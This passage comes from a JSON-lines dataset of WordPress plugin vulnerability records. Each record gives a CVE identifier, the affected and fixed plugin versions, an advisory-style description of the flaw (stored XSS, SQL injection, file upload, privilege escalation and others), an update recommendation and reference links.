version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-block-editor-addons\\\/trunk\\\/src\\\/blocks\\\/post-carousel\\\/index.php#L643\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-block-editor-addons\\\/trunk\\\/src\\\/blocks\\\/post-carousel\\\/index.php#L643\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231017\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231017\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-block-editor-addons\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-block-editor-addons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0e5c85-72c3-4f09-aade-ec5a82b9cc41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0e5c85-72c3-4f09-aade-ec5a82b9cc41?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13519","slug":"marketking-multivendor-marketplace-for-woocommerce","versionImpact":"1.9.80","versionEndExcluding":"2.0.0","description":"The MarketKing \u2014 Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's settings in all versions up to, and including, 1.9.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3180752%40marketking-multivendor-marketplace-for-woocommerce&new=3180752%40marketking-multivendor-marketplace-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3180752%40marketking-multivendor-marketplace-for-woocommerce&new=3180752%40marketking-multivendor-marketplace-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5061e0be-1785-476a-9528-d6f95656bd61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5061e0be-1785-476a-9528-d6f95656bd61?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12559","slug":"clickdesigns","versionImpact":"1.8.0","versionEndExcluding":"2.0.0","description":"The ClickDesigns plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'clickdesigns_add_api' and the 'clickdesigns_remove_api' functions in all versions up to, and including, 1.8.0. This makes it possible for unauthenticated attackers to modify or remove the plugin's API key.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickdesigns\\\/tags\\\/1.8.0\\\/includes\\\/clickdesigns-ajax.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickdesigns\\\/tags\\\/1.8.0\\\/includes\\\/clickdesigns-ajax.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickdesigns\\\/tags\\\/1.8.0\\\/includes\\\/clickdesigns-ajax.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickdesigns\\\/tags\\\/1.8.0\\\/includes\\\/clickdesigns-ajax.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1d19968-dbd8-4433-99a7-b973a59c4653?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1d19968-dbd8-4433-99a7-b973a59c4653?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4560","slug":"chatbot-chatgpt","versionImpact":"1.9.9","versionEndExcluding":"2.0.0","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the chatbot_chatgpt_upload_file_to_assistant function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bc33a05-d462-492e-9ea5-cf37b887cc94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bc33a05-d462-492e-9ea5-cf37b887cc94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-file-upload.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-file-upload.php#L17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2601","slug":"wpbrutalai","versionEndExcluding":"2.0.0","description":"The wpbrutalai WordPress plugin before 2.0.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57769468-3802-4985-bf5e-44ec1d59f5fd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57769468-3802-4985-bf5e-44ec1d59f5fd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5163","slug":"weather-atlas","versionImpact":"1.2.1","versionEndExcluding":"2.0.0","description":"The Weather Atlas Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'shortcode-weather-atlas' shortcode in versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2324caa-f804-4f76-9d08-8951fbee4669?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2324caa-f804-4f76-9d08-8951fbee4669?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L838\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L838\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L858\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L858\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L844\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L844\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L845\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L845\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L860\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weather-atlas\\\/tags\\\/1.2.1\\\/includes\\\/class-weather-atlas.php#L860\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12521","slug":"slotti-ajanvaraus","versionImpact":"1.3.1","versionEndExcluding":"2.0.0","description":"The Slotti Ajanvaraus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slotti-embed-ga' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218204%40slotti-ajanvaraus&new=3218204%40slotti-ajanvaraus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218204%40slotti-ajanvaraus&new=3218204%40slotti-ajanvaraus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d95ec4b-0cbc-49c6-821e-7050d8045159?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d95ec4b-0cbc-49c6-821e-7050d8045159?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13383","slug":"hd-quiz","versionImpact":"1.8.14","versionEndExcluding":"2.0.0","description":"The HD Quiz WordPress plugin before 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85bc905d-c960-4399-a879-2d18a4b03007\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85bc905d-c960-4399-a879-2d18a4b03007\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8418","slug":"b-slider","versionImpact":"1.1.30","versionEndExcluding":"2.0.0","description":"The B Slider- Gutenberg Slider Block for WP plugin for WordPress is vulnerable to Arbitrary Plugin Installation in all versions up to, and including, 1.1.30. This is due to missing capability checks on the activated_plugin function. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins on the server which can make remote code execution possible.","recommendation":"Update to version 2.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.28\\\/adminMenu.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-slider\\\/tags\\\/1.1.28\\\/adminMenu.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342079\\\/b-slider\\\/trunk\\\/adminMenu.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342079\\\/b-slider\\\/trunk\\\/adminMenu.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/deffd646-5117-4086-bf4b-8a17ffdaad8b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/deffd646-5117-4086-bf4b-8a17ffdaad8b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10013","slug":"kau-boys-backend-localization","versionImpact":"1.6.1","versionEndExcluding":"2.0","description":"A vulnerability was found in Kau-Boy Backend Localization Plugin up to 1.6.1 on WordPress. It has been rated as problematic. This issue affects some unknown processing of the file backend_localization.php. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.0 is able to address this issue. The name of the patch is 43dc96defd7944da12ff116476a6890acd7dd24b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-227231.","recommendation":"Update to version 2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227231\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227231\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227231\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227231\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/commit\\\/43dc96defd7944da12ff116476a6890acd7dd24b\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/commit\\\/43dc96defd7944da12ff116476a6890acd7dd24b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/releases\\\/tag\\\/2.0\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/releases\\\/tag\\\/2.0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10151","slug":"auto-iframe","versionImpact":"1.9","versionEndExcluding":"2.0","description":"The Auto iFrame WordPress plugin before 2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/487facf7-8880-48b3-b1b2-0d09823d3c46\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/487facf7-8880-48b3-b1b2-0d09823d3c46\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3276","slug":"skt-blocks","versionImpact":"1.9","versionEndExcluding":"2.0","description":"The SKT Blocks \u2013 Gutenberg based Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Carousel block in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267889%40skt-blocks&new=3267889%40skt-blocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267889%40skt-blocks&new=3267889%40skt-blocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9345eaa-c8c0-4830-a9af-48305a2f80fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9345eaa-c8c0-4830-a9af-48305a2f80fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10857","slug":"product-input-fields-for-woocommerce","versionImpact":"1.9","versionEndExcluding":"2.0","description":"The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.9 via the handle_downloads() function due to insufficient file path validation\/sanitization. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195423\\\/product-input-fields-for-woocommerce\\\/trunk?contextall=1&old=3173573&old_path=%2Fproduct-input-fields-for-woocommerce%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195423\\\/product-input-fields-for-woocommerce\\\/trunk?contextall=1&old=3173573&old_path=%2Fproduct-input-fields-for-woocommerce%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e45207af-3886-4d95-9cd8-5ecdc683dc58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e45207af-3886-4d95-9cd8-5ecdc683dc58?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13752","slug":"wedevs-project-manager","versionImpact":"2","versionEndExcluding":"2","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check in the '\/pm\/v2\/settings\/notice' endpoint all versions up to, and including, 2.6.17. This makes it possible for authenticated attackers, with Subscriber-level access and above, to cause a persistent denial of service condition.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Upgrades\\\/Upgrade_2_0.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Upgrades\\\/Upgrade_2_0.php#L255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Upgrades\\\/Upgrade_2_3.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Upgrades\\\/Upgrade_2_3.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239348\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239348\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwedevs-project-manager%2Ftags%2F2.6.17%2Fsrc%2FSettings%2FControllers%2FSettings_Controller.php&old=3213295&new_path=%2Fwedevs-project-manager%2Ftags%2F2.6.18%2Fsrc%2FSettings%2FControllers%2FSettings_Controller.php&new=3240807&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwedevs-project-manager%2Ftags%2F2.6.17%2Fsrc%2FSettings%2FControllers%2FSettings_Controller.php&old=3213295&new_path=%2Fwedevs-project-manager%2Ftags%2F2.6.18%2Fsrc%2FSettings%2FControllers%2FSettings_Controller.php&new=3240807&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwedevs-project-manager%2Ftrunk%2Froutes%2Fsettings.php&old=3213295&new_path=%2Fwedevs-project-manager%2Ftrunk%2Froutes%2Fsettings.php&new=3240806&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwedevs-project-manager%2Ftrunk%2Froutes%2Fsettings.php&old=3213295&new_path=%2Fwedevs-project-manager%2Ftrunk%2Froutes%2Fsettings.php&new=3240806&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd54a50b-13ce-43ce-bce1-8fe132abc07e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd54a50b-13ce-43ce-bce1-8fe132abc07e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6187","slug":"bsecure","versionImpact":"2","versionEndExcluding":"2","description":"The bSecure plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within its order_info REST endpoint in versions 1.3.7 through 1.7.9. The plugin registers the \/webhook\/v2\/order_info\/ route with a permission_callback that always returns true, effectively bypassing all authentication. This makes it possible for unauthenticated attackers who know any user\u2019s email to obtain a valid login cookie and fully impersonate that account.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsecure\\\/tags\\\/1.7.9\\\/includes\\\/class-bsecure-checkout.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsecure\\\/tags\\\/1.7.9\\\/includes\\\/class-bsecure-checkout.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsecure\\\/tags\\\/1.7.9\\\/includes\\\/class-wc-bsecure.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsecure\\\/tags\\\/1.7.9\\\/includes\\\/class-wc-bsecure.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bsecure\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bsecure\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8f51029-0748-4943-b0ef-fc822b14614a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8f51029-0748-4943-b0ef-fc822b14614a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3880","slug":"social-polls-by-opinionstage","versionImpact":"19.9.0","versionEndExcluding":"19.10.0","description":"The Poll, Survey & Quiz Maker Plugin by Opinion Stage plugin for WordPress is vulnerable to unauthorized modification of data due to a misconfigured capability check on several functions in all versions up to, and including, 19.9.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to change the email address for the account connection, and disconnect the plugin. Previously created content will still be displayed and functional if the account is disconnected.","recommendation":"Update to version 19.10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-polls-by-opinionstage\\\/trunk\\\/plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-polls-by-opinionstage\\\/trunk\\\/plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-polls-by-opinionstage\\\/trunk\\\/src\\\/Modules\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-polls-by-opinionstage\\\/trunk\\\/src\\\/Modules\\\/Admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310848\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310848\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba86268a-7bd6-40ed-9af6-29409245675d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba86268a-7bd6-40ed-9af6-29409245675d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4344","slug":"wp-simple-firewall","versionImpact":"19.1.10","versionEndExcluding":"19.1.11","description":"The Shield Security \u2013 Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 19.1.13. This is due to missing or incorrect nonce validation on the exec function. This makes it possible for unauthenticated attackers to disable pin protection for the admin interface of the plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 19.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d3b9cde-e4d8-4217-96b4-f6ad00cd3a2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d3b9cde-e4d8-4217-96b4-f6ad00cd3a2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-firewall\\\/trunk\\\/src\\\/lib\\\/src\\\/ActionRouter\\\/Actions\\\/SecurityAdminRemove.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-firewall\\\/trunk\\\/src\\\/lib\\\/src\\\/ActionRouter\\\/Actions\\\/SecurityAdminRemove.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3079504%40wp-simple-firewall%2Ftrunk&old=3079461%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3079504%40wp-simple-firewall%2Ftrunk&old=3079461%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6989","slug":"wp-simple-firewall","versionImpact":"18.5.9","versionEndExcluding":"18.5.10","description":"The Shield Security \u2013 Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"Update to version 18.5.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/063826cc-7ff3-4869-9831-f6a4a4bbe74c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/063826cc-7ff3-4869-9831-f6a4a4bbe74c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3013699%40wp-simple-firewall&new=3013699%40wp-simple-firewall&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3013699%40wp-simple-firewall&new=3013699%40wp-simple-firewall&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4359","slug":"nmedia-user-file-uploader","versionEndExcluding":"18.3","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary Post Deletion in versions up to, and including, 18.2. This is due to lacking authentication protections and lacking a security nonce on the wpfm_delete_file AJAX action. This makes it possible for unauthenticated attackers to delete any posts and pages on the site.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84c61d00-20c1-4176-a74d-ea6ff6220f26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84c61d00-20c1-4176-a74d-ea6ff6220f26?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
